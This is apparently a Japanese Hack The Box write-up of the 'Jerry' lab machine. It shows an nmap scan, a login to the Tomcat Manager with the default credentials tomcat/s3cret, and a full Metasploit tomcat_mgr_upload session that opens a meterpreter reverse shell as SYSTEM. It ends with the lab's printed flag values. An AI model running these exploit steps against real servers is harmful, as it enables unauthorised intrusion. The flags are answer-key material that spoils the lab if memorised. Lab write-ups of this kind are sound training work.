8080番ポートが公開されている
# nmap -A -n -F -T5 jerry.htb Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-16 14:08 UTC Nmap scan report for jerry.htb (10.10.10.95) Host is up (0.050s latency). Not shown: 99 filtered ports PORT STATE SERVICE VERSION 8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1 |_http-favicon: Apache Tomcat |_http-open-proxy: Proxy might be redirecting requests |_http-server-header: Apache-Coyote/1.1 |_http-title: Apache Tomcat/7.0.88 Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port OS fingerprint not ideal because: Timing level 5 (Insane) used No OS matches for host Network Distance: 2 hops
8080番ポートにアクセスしてみる
[Manager App]をクリックすると認証画面が表示されるため、何度かパスワードを間違えると403ページが表示された。
ここに記載された以下ID・PWで[Manager App]にログインできた。
ID:tomcat
PW:s3cret
tomcatを起点にして攻撃する
リバースシェルをアップロードしてflagsを取得した。
msf5 exploit(windows/http/cayin_xpost_sql_rce) > search tomcat Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 auxiliary/admin/http/ibm_drm_download 2020-04-21 normal Yes IBM Data Risk Manager Arbitrary File Download 1 auxiliary/admin/http/tomcat_administration normal No Tomcat Administration Tool Default Access 2 auxiliary/admin/http/tomcat_utf8_traversal 2009-01-09 normal No Tomcat UTF-8 Directory Traversal Vulnerability 3 auxiliary/admin/http/trendmicro_dlp_traversal 2009-01-09 normal No TrendMicro Data Loss Prevention 5.5 Directory Traversal 4 auxiliary/dos/http/apache_commons_fileupload_dos 2014-02-06 normal No Apache Commons FileUpload and Apache Tomcat DoS 5 auxiliary/dos/http/apache_tomcat_transfer_encoding 2010-07-09 normal No Apache Tomcat Transfer-Encoding Information Disclosure and DoS 6 auxiliary/dos/http/hashcollision_dos 2011-12-28 normal No Hashtable Collisions 7 auxiliary/scanner/http/tomcat_enum normal No Apache Tomcat User Enumeration 8 auxiliary/scanner/http/tomcat_mgr_login normal No Tomcat Application Manager Login Utility 9 exploit/linux/http/cisco_prime_inf_rce 2018-10-04 excellent Yes Cisco Prime Infrastructure Unauthenticated Remote Code Execution 10 exploit/linux/http/cpi_tararchive_upload 2019-05-15 excellent Yes Cisco Prime Infrastructure Health Monitor TarArchive Directory Traversal Vulnerability 11 exploit/multi/http/cisco_dcnm_upload_2019 2019-06-26 excellent Yes Cisco Data Center Network Manager Unauthenticated Remote Code Execution 12 exploit/multi/http/struts2_namespace_ognl 2018-08-22 excellent Yes Apache Struts 2 Namespace Redirect OGNL Injection 13 exploit/multi/http/struts_code_exec_classloader 2014-03-06 manual No Apache Struts ClassLoader Manipulation Remote Code Execution 14 exploit/multi/http/struts_dev_mode 2012-01-06 excellent Yes Apache Struts 2 Developer Mode OGNL Execution 15 exploit/multi/http/tomcat_jsp_upload_bypass 2017-10-03 excellent Yes Tomcat RCE via JSP Upload Bypass 16 exploit/multi/http/tomcat_mgr_deploy 2009-11-09 excellent Yes Apache Tomcat Manager Application Deployer Authenticated Code Execution 17 exploit/multi/http/tomcat_mgr_upload 2009-11-09 excellent Yes Apache Tomcat Manager Authenticated Upload Code Execution 18 exploit/multi/http/zenworks_configuration_management_upload 2015-04-07 excellent Yes Novell ZENworks Configuration Management Arbitrary File Upload 19 exploit/windows/http/cayin_xpost_sql_rce 2020-06-04 excellent Yes Cayin xPost wayfinder_seqid SQLi to RCE 20 exploit/windows/http/tomcat_cgi_cmdlineargs 2019-04-10 excellent Yes Apache Tomcat CGIServlet enableCmdLineArguments Vulnerability 21 post/multi/gather/tomcat_gather normal No Gather Tomcat Credentials 22 post/windows/gather/enum_tomcat normal No Windows Gather Apache Tomcat Enumeration Interact with a module by name or index, for example use 22 or use post/windows/gather/enum_tomcat msf5 exploit(windows/http/cayin_xpost_sql_rce) > use exploit/multi/http/tomcat_mgr_upload [*] No payload configured, defaulting to java/meterpreter/reverse_tcp msf5 exploit(multi/http/tomcat_mgr_upload) > show options Module options (exploit/multi/http/tomcat_mgr_upload): Name Current Setting Required Description ---- --------------- -------- ----------- HttpPassword no The password for the specified username HttpUsername no The username to authenticate as Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>' RPORT 80 yes The target port (TCP) SSL false no Negotiate SSL/TLS for outgoing connections TARGETURI /manager yes The URI path of the manager app (/html/upload and /undeploy will be used) VHOST no HTTP server virtual host Payload options (java/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST 172.17.0.2 yes The listen address (an interface may be specified) LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Java Universal msf5 exploit(multi/http/tomcat_mgr_upload) > set HttpPassword s3cret HttpPassword => s3cret msf5 exploit(multi/http/tomcat_mgr_upload) > set HttpUsername tomcat HttpUsername => tomcat msf5 exploit(multi/http/tomcat_mgr_upload) > set RHOSTS jerry.htb RHOSTS => jerry.htb msf5 exploit(multi/http/tomcat_mgr_upload) > set RPORT 8080 RPORT => 8080 msf5 exploit(multi/http/tomcat_mgr_upload) > set LHOST 10.10.14.7 LHOST => 10.10.14.7 msf5 exploit(multi/http/tomcat_mgr_upload) > exploit [-] Handler failed to bind to 10.10.14.7:4444:- - [*] Started reverse TCP handler on 0.0.0.0:4444 [*] Retrieving session ID and CSRF token... [*] Uploading and deploying heHP934kTwG31cQvov... [*] Executing heHP934kTwG31cQvov... [*] Sending stage (53944 bytes) to 172.17.0.1 [*] Meterpreter session 1 opened (172.17.0.2:4444 -> 172.17.0.1:53072) at 2020-08-16 15:28:45 +0000 [*] Undeploying heHP934kTwG31cQvov ... meterpreter > getuid Server username: JERRY$ meterpreter > shell Process 1 created. Channel 1 created. Microsoft Windows [Version 6.3.9600] (c) 2013 Microsoft Corporation. All rights reserved. C:\apache-tomcat-7.0.88>whoami whoami nt authority\system C:\apache-tomcat-7.0.88>type "C:\Users\Administrator\Desktop\flags\2 for the price of 1.txt" type "C:\Users\Administrator\Desktop\flags\2 for the price of 1.txt" user.txt 7004dbcef0f854e0fb401875f26ebd00 root.txt 04a8b36e1545a455393d067e772fe90e